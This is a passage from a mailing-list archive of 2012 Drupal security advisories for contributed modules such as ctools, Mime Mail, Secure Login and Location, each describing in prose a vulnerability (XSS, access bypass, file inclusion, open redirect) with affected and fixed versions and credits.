6.x-1.7 [5] Also see the Taxonomy Image [6] project page. REPORTED BY - * Chris Burgess [7] FIXED BY * Nancy Wichmann [8], the module maintainer * Niklas Fiekas [9], the module maintainer * Chris Burgess [10] COORDINATED BY -- * Greg Knaddison [11] of the Drupal Security Team * Ivo Van Geertruyen [12] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16]. [1] http://drupal.org/project/taxonomy_image [2] http://drupal.org/security-team/risk-levels [3] https://drupal.org/node/65409 [4] http://drupal.org/project/taxonomy_image [5] http://drupal.org/node/1760678 [6] http://drupal.org/project/taxonomy_image [7] http://drupal.org/user/76026 [8] http://drupal.org/user/101412 [9] http://drupal.org/user/1089248 [10] http://drupal.org/user/76026 [11] http://drupal.org/user/36762 [12] http://drupal.org/user/383424 [13] http://drupal.org/contact [14] http://drupal.org/security-team [15] http://drupal.org/writing-secure-code [16] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-131 - Email Field - Access Bypass
View online: http://drupal.org/node/1762470 * Advisory ID: DRUPAL-SA-CONTRIB-2012-131 * Project: Email Field [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-August-29 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The email module provides a field type (CCK / FieldAPI) for storing email addresses. Furthermore, it provides a formatter to output the email address as a link to a contact form. The contact form formatter allows a site visitor to email the stored address without letting them see what that e-mail address is. The module didn't sufficiently check access for the contact form page, allowing a site visitor to email the stored address on the entity without having access to the entity itself. CVE: Requested VERSIONS AFFECTED --- * Email Field 6.x-1.x versions prior to 6.x-1.2. * Email Field 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Email Field [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Email Field module for Drupal 6.x, upgrade to Email Field 6.x-1.3 [4] * If you use the Email Field module for Drupal 7.x, upgrade to Email Field 7.x-1.2 [5] Also see the Email Field [6] project page. REPORTED BY - * Joachim Noreiko [7] FIXED BY * Joachim Noreiko [8] * Matthias Hutterer [9] the module maintainer * Greg Knaddison [10] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/email [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/email [4] http://drupal.org/node/1761968 [5] http://drupal.org/node/1761948 [6] http://drupal.org/project/email [7] http://drupal.org/user/107701 [8] http://drupal.org/user/107701 [9] http://drupal.org/user/59747 [10] http://drupal.org/user/36762 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-132 - Announcements - Access Bypass
View online: http://drupal.org/node/1762480 * Advisory ID: DRUPAL-SA-CONTRIB-2012-132 * Project: Announcements [1] (third-party module) * Version: 6.x * Date: 2012-August-29 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Announcements module creates an "announcement" content type and provides both node views and block lists. The module doesn't sufficiently check node access under certain conditions. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "access announcements". CVE: Requested VERSIONS AFFECTED --- * Announcements 6.x-1.x versions prior to 6.x-1.5. Drupal core is not affected. If you do not use the contributed Announcements [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Announcements module for Drupal 6.x, upgrade to Announcements 6.x-1.5 [4] Also see the Announcements [5] project page. REPORTED BY - * Michael Hess [6] of the Drupal Security Team FIXED BY * Nancy Wichmann [7], the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/announcements [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/announcements [4] http://drupal.org/node/1761038 [5] http://drupal.org/project/announcements [6] http://drupal.org/user/102818 [7] http://drupal.org/user/101412 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-127 - Custom Publishing Options - Cross Site Scripting (XSS) Vulnerability
View online: http://drupal.org/node/1732980 * Advisory ID: DRUPAL-SA-CONTRIB-2012-127 * Project: Custom Publishing Options [1] (third-party module) * Version: 6.x * Date: 2012-August-15 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Custom Publishing Options module allows you to create custom publishing options for nodes. It allows you to add to the default options of Publish, Promote to Front Page, and Sticky. It also ingrates with views to allow you add as a field, sort and filter by, your custom options. The module doesn't sufficiently sanitize status labels containing HTML. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer nodes". CVE: Requested VERSIONS AFFECTED --- * Custom Publishing Options 6.x-1.x versions prior to 6.x-1.4. Drupal core is not affected. If you do not use the contributed Custom Publishing Options [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Custom Publishing Options module for Drupal 6.x, upgrade to Custom Publishing Options 6.x-1.5 [4] Also see the Custom Publishing Options [5] project page. REPORTED BY - * Publicly disclosed. FIXED BY * Kevin Quillen [6] COORDINATED BY -- * Greg Knaddison [7] of the Drupal Security Team * Ivo Van Geertruyen [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/custom_pub [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/custom_pub [4] http://drupal.org/node/1730766 [5] http://drupal.org/project/custom_pub [6] http://drupal.org/user/317279 [7] http://drupal.org/user/36762 [8] http://drupal.org/user/383424 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-128 - Elegant Theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1733056 * Advisory ID: DRUPAL-SA-CONTRIB-2012-128 * Project: Elegant Theme [1] (third-party module) * Version: 7.x * Date: 2012-August-15 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Elegant Theme is a light weight Drupal 7 theme with a modern look and feel. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE: Requested VERSIONS AFFECTED --- * Elegant Theme 7.x-1.x versions prior to 7.x-1.0. Drupal core is not affected. If you do not use the contributed Elegant Theme [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Elegant Theme for Drupal 7.x, upgrade to Elegant Theme 7.x-1.1 [4] Also see the Elegant Theme [5] project page. REPORTED BY - * Greg Knaddison [6] of the Drupal Security Team FIXED BY * saran.quardz [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/elegant_theme [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/elegant_theme [4] http://drupal.org/node/1722880 [5] http://drupal.org/project/elegant_theme [6] http://drupal.org/user/36762 [7] http://drupal.org/user/1031208 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-126 - Hotblocks - Cross Site Scripting (XSS) and Denial of Service (DoS)
View online: http://drupal.org/node/1732946 * Advisory ID: DRUPAL-SA-CONTRIB-2012-126 * Project: HotBlocks [1] (third-party module) * Version: 6.x * Date: 2012-August-15 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Multiple vulnerabilities DESCRIPTION - The Hotblocks module provides an enhanced GUI for administering blocks and block content that is intended to be simpler and more controllable for less privileged users than the default block administration tools. Cross Site Scripting (XSS) The module doesn't sufficiently sanitize the user input for "block names" on the module's settings page. A user could inject arbitrary scripts into pages affecting site users. This XSS vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer hotblocks". Denial of Service (DoS) The hotblocks user interface also allows a user to configure one hotblock to reference itself as content, thereby creating an infinite loop and potentially rendering a site unusable. The DoS vulnerability is mitigated by the fact that a user must have a role with the permission "administer hotblocks" or a user with said permission must have configured the site such that it allows hotblocks to be embedded in other hotblocks. CVE: Requested VERSIONS AFFECTED --- * Hotblocks 6.x-1.x versions prior to 6.x-1.8. Drupal core is not affected. If you do not use the contributed HotBlocks [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Hotblocks module for Drupal 6.x, upgrade to Hotblocks 6.x-1.8 [4] Also see the HotBlocks [5] project page. REPORTED BY - * Justin C. Klein Keane [6] FIXED BY * Justin Dodge [7] the module maintainer COORDINATED BY -- * Greg Knaddison [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/hotblocks [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/hotblocks [4] http://drupal.org/node/1732828 [5] http://drupal.org/project/hotblocks [6] http://drupal.org/user/302225 [7] http://drupal.org/user/238638 [8] http://drupal.org/user/36762 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-125 - Chaos tool suite (ctools) - Local File Inclusion and Cross Site Scripting (XSS)
View online: http://drupal.org/node/1719548 * Advisory ID: DRUPAL-SA-CONTRIB-2012-125 * Project: Chaos tool suite (ctools) [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-August-8 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Local File Inclusion and Cross Site Scripting DESCRIPTION - The Chaos tool suite is primarily a set of APIs and tools to improve the developer experience. The module doesn't sufficiently validate css import statements to confirm they only include css content appropriate to show to end users. This could allow a malicious user to add sensitive content from the site (e.g. settings.php) exposing that sensitive content to visitors of the page. It could also be used to execute a Cross Site Scripting attack. This vulnerability is party mitigated by the fact that an attacker must have a role with a permission to place custom CSS into a field. However, any user who can create or edit a node may have sufficient permissions to place the CSS depending on the site configuration. CVE: Requested VERSIONS AFFECTED --- * Chaos tool suite (ctools) 6.x-1.x versions prior to 6.x-1.9. * Chaos tool suite (ctools) 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Chaos tool suite (ctools) [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Ctools module for Drupal 6.x, upgrade to Ctools 6.x-1.9 [4] * If you use the Ctools module for Drupal 7.x, upgrade to Ctools 7.x-1.1 [5] Also see the Chaos tool suite (ctools) [6] project page. REPORTED BY - * Casey [7] FIXED BY * Tim Plunkett [8] a module maintainer * John Morahan [9] of the Drupal Security Team COORDINATED BY -- * John Morahan [10] of the Drupal Security Team * Heine Deelstra [11] of the Drupal Security Team * Greg Knaddison [12] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16]. [1] http://drupal.org/project/ctools [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/ctools [4] http://drupal.org/node/1719786 [5] http://drupal.org/node/1719782 [6] http://drupal.org/project/ctools [7] http://drupal.org/user/32403 [8] http://drupal.org/user/241634 [9] http://drupal.org/user/58170 [10] http://drupal.org/user/58170 [11] http://drupal.org/user/17943 [12] http://drupal.org/user/36762 [13] http://drupal.org/contact [14] http://drupal.org/security-team [15] http://drupal.org/writing-secure-code [16] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-124 - Mime Mail - Access Bypass
View online: http://drupal.org/node/1719482 * Advisory ID: DRUPAL-SA-CONTRIB-2012-124 * Project: Mime Mail [1] (third-party module) * Version: 6.x * Date: 2012-August-8 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The MIME Mail module allows users to send MIME-encoded e-mail messages with embedded images and attachments. The module doesn't perform proper access checks, allowing a user to send arbitrary (e.g. the settings.php) files as attachments. In the latest version users must have the "send arbitrary files" permission to access files located outside the public files directory. CVE: Requested VERSIONS AFFECTED --- * Mime Mail 6.x-1.x versions prior to 6.x-1.1. Drupal core is not affected. If you do not use the contributed Mime Mail [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Mime Mail module for Drupal 6.x, upgrade to Mime Mail 6.x-1.1 [4] Also see the Mime Mail [5] project page. REPORTED BY - * joglin [6] FIXED BY * Jeremiah Davis [7] the module maintainer * Gabor Seljan [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Dave Reid [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/mimemail [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/mimemail [4] http://drupal.org/node/1719446 [5] http://drupal.org/project/mimemail [6] http://drupal.org/user/86464 [7] http://drupal.org/user/228997 [8] http://drupal.org/user/232117 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/53892 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-123 - Shibboleth authentication - Access Bypass
View online: http://drupal.org/node/1719462 * Advisory ID: DRUPAL-SA-CONTRIB-2012-123 * Project: Shibboleth authentication [1] (third-party module) * Version: 6.x * Date: 2012-August-8 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Shibboleth authentication module provides user authentication with Shibboleth single sign-on systems (both v1.3 and v2.0) as well as some authorization features (automatic role assignment based on Shibboleth attributes). The module doesn't sufficiently confirm the user's active status in Drupal when authenticating a user whose account could be blocked. CVE: Requested VERSIONS AFFECTED --- * Shibboleth authentication all versions prior to 6.x-4.0-rc3. Drupal core is not affected. If you do not use the contributed Shibboleth authentication [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Shibboleth authentication module for Drupal 6.x, upgrade to Shibboleth authentication 6.x-4.0 [4] Shibboleth authentication releases for Drupal 7.x are not affected. Also see the Shibboleth authentication [5] project page. REPORTED BY - * Brian Swaney [6] FIXED BY Fixed by newer releases. CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7]. Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10]. [1] http://drupal.org/project/shib_auth [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/shib_auth [4] http://drupal.org/node/1332976 [5] http://drupal.org/project/shib_auth [6] http://drupal.org/user/608968 [7] http://drupal.org/contact [8] http://drupal.org/security-team [9] http://drupal.org/writing-secure-code [10] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-122 - Better Revisions - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1719402 * Advisory ID: DRUPAL-SA-CONTRIB-2012-122 * Project: Better Revisions [1] (third-party module) * Version: 7.x * Date: 2012-August-08 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Better Revisions module changes the built-in revision log text area to a customizable select list with an optional description field. It also allows an administrator to make the list and/or description field required. The module doesn't sufficiently validate strings entered in the administration interface. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer better revisions". CVE: Requested VERSIONS AFFECTED --- * Better Revisions 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Better Revisions [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Better Revisions module for Drupal 7.x, upgrade to Better Revisions 7.x-1.1 [4] Also see the Better Revisions [5] project page. REPORTED BY - * Klaus Purer [6] of the Drupal Security Team FIXED BY * Roy Baxter [7] the module maintainer COORDINATED BY -- * Klaus Purer [8] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/better_revisions [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/better_revisions [4] http://drupal.org/node/1713378 [5] http://drupal.org/project/better_revisions [6] http://drupal.org/user/262198 [7] http://drupal.org/user/360394 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-121 - Shorten URLs - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1719392 * Advisory ID: DRUPAL-SA-CONTRIB-2012-121 * Project: Shorten URLs [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-August-8 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The Shorten URLs module provides an API to shorten URLs via many services like bit.ly and TinyURL, as well as a block and a page that provide an interface for easily shortening URLs. Cross Site Scripting via report The module doesn't sufficiently sanitize user input when displaying shortened URLs. This vulnerability is mitigated by several factors: * The Record Shortened URLs submodule must be installed * The Views module must /not/ be installed * An attacker must either have the "use Shorten URLs page" permission or access to the Shorten URLs block CVE: Requested Cross Site Scripting via Custom Services List There is an additional XSS vulnerability where the module doesn't sufficiently sanitize user input when displaying custom URL shortening services. This vulnerability is mitigated by the fact that the "Shorten URLs Custom Services" submodule must be enabled and the attacker must have the "administer Shorten URLs custom services" permission, which should not be given to non-administrators. CVE: Requested VERSIONS AFFECTED --- * Shorten URLs 6.x-1.x versions prior to 6.x-1.13. * Shorten URLs 7.x-1.x versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Shorten URLs [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Shorten URLs module for Drupal 6.x, upgrade to Shorten URLs 6.x-1.13 [4] * If you use the Shorten URLs module for Drupal 7.x, upgrade to Shorten URLs 7.x-1.2 [5] Also see the Shorten URLs [6] project page. REPORTED BY - * Zach Alexander [7] * Justin Klein Keane [8] FIXED BY * Isaac Sukin [9], the module maintainer * Zach Alexander [10] * Justin Klein Keane [11] COORDINATED BY -- * Stella Power [12] of the Drupal Security Team * Greg Knaddison [13] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17]. [1] http://drupal.org/project/shorten [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/shorten [4] https://drupal.org/node/1719306 [5] https://drupal.org/node/1719310 [6] http://drupal.org/project/shorten [7] https://drupal.org/user/1972656 [8] https://drupal.org/user/302225 [9] https://drupal.org/user/201425 [10] https://drupal.org/user/1972656 [11] https://drupal.org/user/302225 [12] http://drupal.org/user/66894 [13] http://drupal.org/user/36762 [14] http://drupal.org/contact [15] http://drupal.org/security-team [16] http://drupal.org/writing-secure-code [17] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-120 - Monthly Archive by Node Type - Access Bypass (unsupported)
View online: http://drupal.org/node/1708198 * Advisory ID: DRUPAL-SA-CONTRIB-2012-120 * Project: Monthly Archive by Node Type [1] (third-party module) * Version: 6.x * Date: 2012-August-1 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module generates a monthly archive and block for specified node types, as well as an archive and block for whichever collection of node types you specify. The module doesn't sufficiently ensure node access for sites that use a node access system. This vulnerability is mitigated by the fact that it only affects sites using a node_access module. CVE: Requested VERSIONS AFFECTED --- * All versions of the "montharchive" (Monthly Archive by Node Type [3]) module are affected. Drupal core is not affected. If you do not use the contributed Monthly Archive by Node Type [4] module, there is nothing you need to do. SOLUTION Remove the module; all versions of the module are affected by this vulnerability. Also see the Monthly Archive by Node Type [5] project page. REPORTED BY - * M Yaddoshi [6] FIXED BY No fix was supplied. COORDINATED BY -- * Michael Hess [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/montharchive [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/montharchive [4] http://drupal.org/project/montharchive [5] http://drupal.org/project/montharchive [6] http://drupal.org/user/150240 [7] http://drupal.org/user/102818 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-119 - Excluded Users - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1708058 * Advisory ID: DRUPAL-SA-CONTRIB-2012-119 * Project: Excluded Users [1] (third-party module) * Version: 6.x * Date: 2012-August-1 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Excluded Users is a helper module which allows administrators to select users to not appear in user listings. The module displays a list of user names and email addresses without sanitizing them. In the event that someone manages to insert malicious code into a user name or email address, this might lead to an XSS attack. This vulnerability is mitigated by the fact that the user name and email address are validated on creation by default but other user creation methods could create a vulnerability. CVE: Requested VERSIONS AFFECTED --- * Excluded Users 6.x-1.x versions prior to 6.x-1.1. Drupal core is not affected. If you do not use the contributed Excluded Users [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Excluded Users module for Drupal 6.x, upgrade to Excluded Users 6.x-1.1 [4] Also see the Excluded Users [5] project page. REPORTED BY - * Fox [6] FIXED BY * Ricky Morse [7] the 6.x module maintainer COORDINATED BY -- * Michael Hess [8] of the Drupal Security Team * Peter Wolanin [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/excluded_users [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/excluded_users [4] http://drupal.org/node/1702984 [5] http://drupal.org/project/excluded_users [6] http://drupal.org/user/426416 [7] http://drupal.org/user/37599 [8] http://drupal.org/user/102818 [9] http://drupal.org/user/49851 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-118 - Secure Login - Open Redirect
View online: http://drupal.org/node/1700594 * Advisory ID: DRUPAL-SA-CONTRIB-2012-118 * Project: Secure Login [1] (third-party module) * Version: 7.x * Date: 2012-July-25 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Open Redirect DESCRIPTION - Secure Login module enables the user login and other forms to be submitted securely via HTTPS, thus preventing passwords and other private user data from being transmitted in clear text. In addition, Secure Login module by default redirects non-HTTPS GET requests for pages containing forms that it secures to the HTTPS site. The module does not sufficiently validate that a requested path is internal to the site, allowing an attacker to disguise a malicious destination address as a GET query parameter passed to a non-HTTPS site URL. This vulnerability is mitigated by the fact that the target site must render a form secured by Secure Login module on its 404 page, such as in a block. A default installation of Drupal 7 renders the user login block on the 404 page, and is thus vulnerable to the open redirect. CVE: Requested VERSIONS AFFECTED --- * Secure Login 7.x-1.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Secure Login [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Secure Login module for Drupal 7.x, upgrade to Secure Login 7.x-1.3 [4]. Also see the Secure Login [5] project page. REPORTED BY - * Albert Martin [6] FIXED BY * Mark Burdett [7], the module maintainer COORDINATED BY -- * Heine Deelstra [8] of the Drupal Security Team * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/securelogin [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/securelogin [4] https://drupal.org/node/1698988 [5] http://drupal.org/project/securelogin [6] https://drupal.org/user/1888132 [7] https://drupal.org/user/12302 [8] http://drupal.org/user/17943 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-117 - Location - Access Bypass
View online: http://drupal.org/node/1700588 * Advisory ID: DRUPAL-SA-CONTRIB-2012-117 * Project: Location [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-July-25 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Location module allows real-world geographic locations to be associated with Drupal nodes, including people, places, and other content. The Location Search sub-module adds a search page for searching for locations. The Location Search module fails to enforce content and user access permissions and node access restrictions, meaning any user can see any node or user results on the location search page. From now on users must have the "access content" permission and any relevant node access rights to see node based location results and the "view user profiles" and "view all user locations" permissions to see user based location results. CVE: Requested VERSIONS AFFECTED --- * Location Search (Location sub-module) 6.x versions prior to 6.x-3.2. * Location Search (Location sub-module) 7.x versions prior to 7.x-3.0-alpha1. Drupal core is not affected. If you do not use the contributed Location 